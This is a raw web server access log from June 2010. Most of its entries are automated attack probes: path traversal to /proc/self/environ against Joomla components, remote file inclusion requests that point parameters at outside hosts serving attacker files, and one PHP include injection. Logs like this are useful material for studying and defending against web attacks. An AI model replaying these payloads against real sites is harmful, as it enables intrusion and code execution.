120.50.40.133 - - [02/Jun/2010:07:57:21 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:07:57:21 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:07:57:51 -0500] "GET /logs/*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [02/Jun/2010:07:57:52 -0500] "GET /*.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
174.121.217.207 - - [02/Jun/2010:07:57:55 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
187.45.193.159 - - [02/Jun/2010:07:59:35 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
187.45.193.159 - - [02/Jun/2010:07:59:35 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
187.45.193.159 - - [02/Jun/2010:07:59:36 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.805"
89.238.145.196 - - [02/Jun/2010:08:01:04 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 308 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:01:04 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:01:04 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:03:15 -0500] "GET /logs/access_log.1270857600//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:03:38 -0500] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:03:38 -0500] "GET //nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:03:38 -0500] "GET /logs/access_log.1263081600//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:04:24 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:04:24 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:04:24 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.46.204.236 - - [02/Jun/2010:08:05:40 -0500] "GET /logs/access_log.1252540800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.0.254.139 - - [02/Jun/2010:08:06:23 -0500] "GET /logs/access_log.1271721600/coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:23 -0500] "GET /logs/coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:23 -0500] "GET /coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:31 -0500] "GET /logs/access_log.1271289600/coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:32 -0500] "GET /logs/coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:32 -0500] "GET /coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:32 -0500] "GET /logs/access_log.1271721600/coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.0.254.139 - - [02/Jun/2010:08:06:48 -0500] "GET /logs/access_log.1271289600/coppercop/theme.php?THEME_DIR=http://www.redeconstruecia.com.br/maringa/fotos/fx29id.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
204.188.235.66 - - [02/Jun/2010:08:06:54 -0500] "GET /logs/access_log.1273363200/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:08:06:54 -0500] "GET /*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:08:06:54 -0500] "GET /logs/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:08:09:28 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:09:28 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:09:28 -0500] "GET /logs/access_log.1271030400//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:09:28 -0500] "GET /logs/access_log.1272672000//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:09:38 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:09:38 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:09:39 -0500] "GET /logs/access_log.1271030400//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
174.121.217.207 - - [02/Jun/2010:08:10:35 -0500] "GET /logs/access_log.1274832000//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:08:10:35 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:08:10:36 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
74.124.198.60 - - [02/Jun/2010:08:11:18 -0500] "GET //nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:11:18 -0500] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:11:18 -0500] "GET /logs/access_log.1263081600//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
204.188.235.66 - - [02/Jun/2010:08:11:48 -0500] "GET /logs/access_log.1274832000/*?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
204.93.174.47 - - [02/Jun/2010:08:13:40 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:13:40 -0500] "GET /logs/access_log.1272672000//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:13:40 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:13:40 -0500] "GET /logs/access_log.1270598400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
174.121.217.207 - - [02/Jun/2010:08:14:41 -0500] "GET /logs/access_log.1273363200//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
74.124.198.60 - - [02/Jun/2010:08:14:49 -0500] "GET //nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:14:49 -0500] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:14:49 -0500] "GET /logs/access_log.1271376000//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:14:49 -0500] "GET /logs/access_log.1263081600//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
174.121.217.207 - - [02/Jun/2010:08:15:44 -0500] "GET /logs/access_log.1274572800//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:08:15:44 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:08:15:44 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:16:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:16:47 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:16:47 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:08:17:05 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:08:17:05 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
77.222.56.62 - - [02/Jun/2010:08:17:33 -0500] "GET /xGB.php?act=admin&do=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:08:17:34 -0500] "GET /logs/xGB.php?act=admin&do=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
64.56.46.102 - - [02/Jun/2010:08:17:39 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
64.56.46.102 - - [02/Jun/2010:08:17:40 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:08:19:20 -0500] "GET /logs/access_log.1274832000//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
74.124.198.60 - - [02/Jun/2010:08:19:39 -0500] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:19:39 -0500] "GET /logs/access_log.1263081600//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [02/Jun/2010:08:19:39 -0500] "GET //nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
38.101.148.126 - - [02/Jun/2010:08:19:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:08:19:49 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
77.222.56.62 - - [02/Jun/2010:08:21:31 -0500] "GET /xGB.php?act=admin&do=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:08:21:31 -0500] "GET /logs/xGB.php?act=admin&do=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:08:23:34 -0500] "GET /xGB.php?act=admin&do=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:08:23:34 -0500] "GET /logs/xGB.php?act=admin&do=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
210.171.151.192 - - [02/Jun/2010:08:24:20 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.co.jp/imglanding?q=vintage%20tattoo%20flash&imgurl=http://farm3.static.flickr.com/2412/1799743363_e3f26f90e5.jpg&imgrefurl=http://www.flickr.com/photos/bonniegrrl/1799743363/&usg=__bkppFuNqYWULcL9UgLOFxmZvaNY=&h=500&w=375&sz=125&hl=ja&itbs=1&tbnid=1yIbueLVFjw5cM:&tbnh=130&tbnw=98&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26hl%3Dja%26tbs%3Disch:1&tbs=isch:1&start=0""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.238.145.196 - - [02/Jun/2010:08:25:42 -0500] "GET //bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 341 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:25:42 -0500] "GET /logs/access_log.1272326400//bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 368 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:25:42 -0500] "GET /logs//bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:25:48 -0500] "GET /logs//bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:25:48 -0500] "GET //bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 341 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:25:52 -0500] "GET /logs/access_log.1272326400//bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 368 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:26:13 -0500] "GET /logs/access_log.1272585600//bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 368 "-""Mozilla/5.0"
89.238.145.196 - - [02/Jun/2010:08:26:20 -0500] "GET /logs/access_log.1272585600//bbs/write_update.php///logs/access.log//write_update.php?board_skin_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 368 "-""Mozilla/5.0"
94.198.96.3 - - [02/Jun/2010:08:26:46 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
94.198.96.3 - - [02/Jun/2010:08:26:46 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
74.55.43.66 - - [02/Jun/2010:08:26:56 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:08:26:56 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.200.76.150 - - [02/Jun/2010:08:27:22 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.200.76.150 - - [02/Jun/2010:08:27:22 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
209.188.90.44 - - [02/Jun/2010:08:27:25 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
209.188.90.44 - - [02/Jun/2010:08:27:25 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.123.39.202 - - [02/Jun/2010:08:27:28 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.123.39.202 - - [02/Jun/2010:08:27:29 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.18.167.170 - - [02/Jun/2010:08:27:34 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.18.167.170 - - [02/Jun/2010:08:27:34 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [02/Jun/2010:08:27:34 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.18.167.170 - - [02/Jun/2010:08:27:34 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
204.93.174.47 - - [02/Jun/2010:08:27:45 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:27:45 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.93.174.47 - - [02/Jun/2010:08:27:46 -0500] "GET /logs/access_log.1271548800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
205.234.101.201 - - [02/Jun/2010:08:28:17 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:28:17 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:28:22 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.101.201 - - [02/Jun/2010:08:28:22 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.204.241 - - [02/Jun/2010:08:30:45 -0500] "GET /logs/access_log.1214611200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.93.174.47 - - [02/Jun/2010:08:31:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:07 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.126.138.51 - - [02/Jun/2010:08:34:07 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ewzine.com//chat/inc/cmses/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
